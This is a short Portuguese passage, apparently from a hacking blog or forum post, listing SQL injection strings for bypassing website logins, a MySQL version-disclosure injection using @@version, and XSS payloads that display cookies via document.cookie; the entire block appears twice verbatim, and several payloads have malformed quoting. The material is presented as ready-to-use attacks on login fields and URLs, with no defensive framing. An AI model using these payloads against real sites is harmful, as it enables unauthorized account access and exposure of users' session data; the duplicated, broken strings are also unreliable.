... Vamos aos rápidos exemplos:
Esse código de SQL injection é inserido no campo de Login ou Username de um site, onde faz com que ele se autentique como aquele usuário com uma senha qualquer:
‘or’=1 '
)or('a'='a
‘or=1
')or('1'='1
‘or’a’=‘a
'or'1'='1
e é colocado uma senha como: xxx
Esse código Mostra a versão do Banco de Dados de MYSQL, onde user123 é conhecido pelo Hacker: 'user123' or 1=(select @@version)-- ou ' union select @@version,1,1--
Vamos ao XSS (inserindo na URL):
Exibindo Cookies:
'"><script>alert('xss');alert(document.cookie)</script> ou
<script>alert('xss');alert(document.cookie)</script>
Esse código de SQL injection é inserido no campo de Login ou Username de um site, onde faz com que ele se autentique como aquele usuário com uma senha qualquer:
‘or’=1 '
)or('a'='a
‘or=1
')or('1'='1
‘or’a’=‘a
'or'1'='1
e é colocado uma senha como: xxx
Esse código Mostra a versão do Banco de Dados de MYSQL, onde user123 é conhecido pelo Hacker: 'user123' or 1=(select @@version)-- ou ' union select @@version,1,1--
Vamos ao XSS (inserindo na URL):
Exibindo Cookies:
'"><script>alert('xss');alert(document.cookie)</script> ou
<script>alert('xss');alert(document.cookie)</script>